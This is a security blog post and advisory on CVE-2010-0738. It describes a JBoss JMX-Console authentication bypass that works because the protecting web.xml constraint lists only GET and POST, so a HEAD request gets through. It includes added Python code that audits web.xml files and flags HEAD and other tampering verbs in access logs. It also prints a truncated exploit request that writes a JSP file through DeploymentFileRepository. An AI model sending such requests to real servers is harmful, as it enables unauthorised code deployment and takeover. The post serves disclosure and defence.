http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
Authentication bypass vulnerabilities are always interesting from a penetration tester's point of view, because 80% of the time they are very simple to abuse. From a technical perspective, the impact of an authentication bypass depends on what you are able to do once you are authenticated.
JBoss has some good management tools that are used to deploy new applications and to perform privileged actions such as executing scripts on the remote host. One of these is the JBoss JMX-Console.
For more information on what an attacker may accomplish through the JMX-Console, I suggest reading the following presentation:
Abusing Jboss by Christian Papathanasiou (Trustwave Spiderlabs)
Here at Minded Security we discovered something more. The JBoss JMX console may be protected with ordinary password authentication, but the standard password protection configuration is vulnerable.
How many times has someone suggested that you secure the JMX console using the standard JBoss security configuration?
The standard JMX Console security configuration is found in:
jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml
This is the suggested security configuration, also available in the official JBoss security guidelines (“White Paper on JMX Security”):
https://jira.jboss.org/jira/browse/SECURITY-31
The suggested configuration for protecting the JMX Console was the following:
<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <description>An example security config that only allows users with the
      role JBossAdmin to access the HTML JMX console web application
    </description>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>JBossAdmin</role-name>
  </auth-constraint>
</security-constraint>
In the configuration above, security restrictions are enabled only for the “GET” and “POST” methods. Any other HTTP method supported by the server is not restricted.
By issuing a request with the “HEAD” method it is possible to invoke directly, with “JBossAdmin” privileges, any functionality implemented by the jmx-console without valid credentials. Note: if the JMX console replies with an HTTP 500 error, the request has still been correctly processed.
This kind of attack is referred to in the AppSec literature as Verb Tampering. The following is a very good paper on this topic:
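The defect is in the web.xml itself, so it can be found before anyone sends a HEAD request. Under the Servlet specification a web-resource-collection that lists http-method elements constrains only those methods; omitting the list makes the constraint apply to every method. The following audit script is an added example written for this article, not code from Minded Security or from JBoss: it parses a web.xml (with or without the usual J2EE namespace), reports every constraint that enumerates methods, and is run against two constructed samples, the weak configuration quoted above and the same constraint with the method list removed.

```python
"""Audit a web.xml for security-constraints that enumerate HTTP methods.

Per the Servlet spec, a <web-resource-collection> that lists <http-method>
elements constrains ONLY those methods; every other verb (HEAD, PUT,
DELETE, OPTIONS, or an arbitrary token) reaches the resource without
authentication. Leaving <http-method> out makes the constraint cover all verbs.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the weak configuration quoted in the post.
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# Constructed sample: same constraint with the method list removed, so it
# applies to every HTTP method (namespaced, as a generated web.xml would be).
FIXED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Strip a namespace prefix such as '{http://...}' from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    """Direct children of elem whose local tag name is `name`."""
    return [c for c in elem if _local(c.tag) == name]


def audit_web_xml(xml_text):
    """Return one finding per web-resource-collection that enumerates methods.

    Each finding records the resource name, URL patterns, the verbs that are
    actually protected and the roles the auth-constraint grants access to.
    An empty list means every constraint in the file applies to all verbs.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        roles = [r.text.strip() for ac in _children(sc, "auth-constraint")
                 for r in _children(ac, "role-name")]
        for wrc in _children(sc, "web-resource-collection"):
            methods = [m.text.strip().upper() for m in _children(wrc, "http-method")]
            if not methods:
                continue  # no method list: the constraint covers every verb
            names = [n.text.strip() for n in _children(wrc, "web-resource-name")]
            patterns = [p.text.strip() for p in _children(wrc, "url-pattern")]
            findings.append({
                "resource": names[0] if names else "",
                "url_patterns": patterns,
                "protected_methods": methods,
                "roles": roles,
            })
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_WEB_XML), ("fixed", FIXED_WEB_XML)):
        for f in audit_web_xml(doc):
            print(f"[{label}] {f['resource']} {f['url_patterns']}: only "
                  f"{f['protected_methods']} require {f['roles']}; "
                  "any other verb bypasses the constraint")
```

Run it against a deployed jmx-console.war/WEB-INF/web.xml and any other web.xml that guards an admin interface; a non-empty result means the constraint can be sidestepped with a verb it does not list, and the remedy is to drop the http-method elements so the constraint covers all verbs.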
Bypassing with HTTP Verb Tampering by Arshan Dabirsiaghi - Aspect Security
The most interesting part is the exploitation. Given access to any JMX console, password protected or not, we can issue a HEAD HTTP request that will work ;D
Standard deployment (will ask for a password):
POST /jmx-console/HtmlAdaptor;index.jsp HTTP/1.1
....
Content-Length: 3512
action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&
arg3=%3C%25%40+page+import%3D%22java.io.*…....
Exploitation with authentication bypass:
HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1
Now pick the request you prefer and build your custom exploit!
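On the defensive side, the bypass leaves a clear trace in the web server's access log: a verb other than GET or POST against the /jmx-console/ path, typically with an invokeOp action in the query string. The detector below is an added example written for this article, not code from Minded Security or JBoss. It parses common-format access-log lines, normalises the `;index.jsp` path parameter away before matching, and deliberately does not filter on the status code, since the post notes that a 500 reply can still mean the request was processed. The log lines it runs over are constructed samples, and the host addresses in them are placeholders.

```python
"""Flag HTTP verb-tampering attempts against the JMX console in access logs.

The weak constraint only guards GET and POST, so the signal is any other verb
reaching a watched path. Match on method + path, not on status code.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

WATCHED_PREFIXES = ("/jmx-console/",)   # extend with other admin paths as needed
EXPECTED_METHODS = {"GET", "POST"}       # the only verbs the weak constraint guards

# Constructed sample log (placeholder addresses): a normal challenged GET,
# the HEAD bypass from the post, unrelated traffic, and a stray OPTIONS probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Apr/2010:10:01:02 +0200] "GET /jmx-console/ HTTP/1.1" 401 1234',
    '10.0.0.5 - - [14/Apr/2010:10:01:09 +0200] "HEAD /jmx-console/HtmlAdaptor;index.jsp'
    '?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository HTTP/1.1" 500 0',
    '10.0.0.9 - - [14/Apr/2010:10:02:00 +0200] "GET /index.html HTTP/1.1" 200 5120',
    '10.0.0.5 - - [14/Apr/2010:10:02:30 +0200] "OPTIONS /jmx-console/ HTTP/1.1" 200 0',
]


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_verb_tampering(lines):
    """Return a finding for each request hitting a watched path with an unexpected verb."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        # Drop the ';index.jsp' path parameter and the query before matching the path.
        path = parts.path.split(";", 1)[0]
        if not path.startswith(WATCHED_PREFIXES):
            continue
        if rec["method"] in EXPECTED_METHODS:
            continue  # guarded by the constraint; a 401 here is expected behaviour
        action = parse_qs(parts.query).get("action", [None])[0]
        findings.append({
            "host": rec["host"],
            "method": rec["method"],
            "path": path,
            "action": action,
            "status": int(rec["status"]),
        })
    return findings


if __name__ == "__main__":
    for f in flag_verb_tampering(SAMPLE_LOG):
        print(f"{f['host']} {f['method']} {f['path']} action={f['action']} "
              f"status={f['status']}  <- verb tampering against JMX console")
```

A HEAD with `action=invokeOp` is the high-confidence case; other verbs against the console path are worth reviewing too, since the constraint does not cover any of them. Feed the function the server's real access log one line at a time, and pair it with the web.xml fix rather than relying on detection alone.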
Reference:
http://www.mindedsecurity.com/MSA030409.html (Official Advisory)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
Solution:
A solution to this issue is already available. See the following Red Hat advisories:
https://rhn.redhat.com/errata/RHSA-2010-0376.html
https://rhn.redhat.com/errata/RHSA-2010-0377.html
https://rhn.redhat.com/errata/RHSA-2010-0378.html
https://rhn.redhat.com/errata/RHSA-2010-0379.html
We would like to thank the Red Hat response team, and in particular Marc Schoenefeld, for their support, technical knowledge and fast response.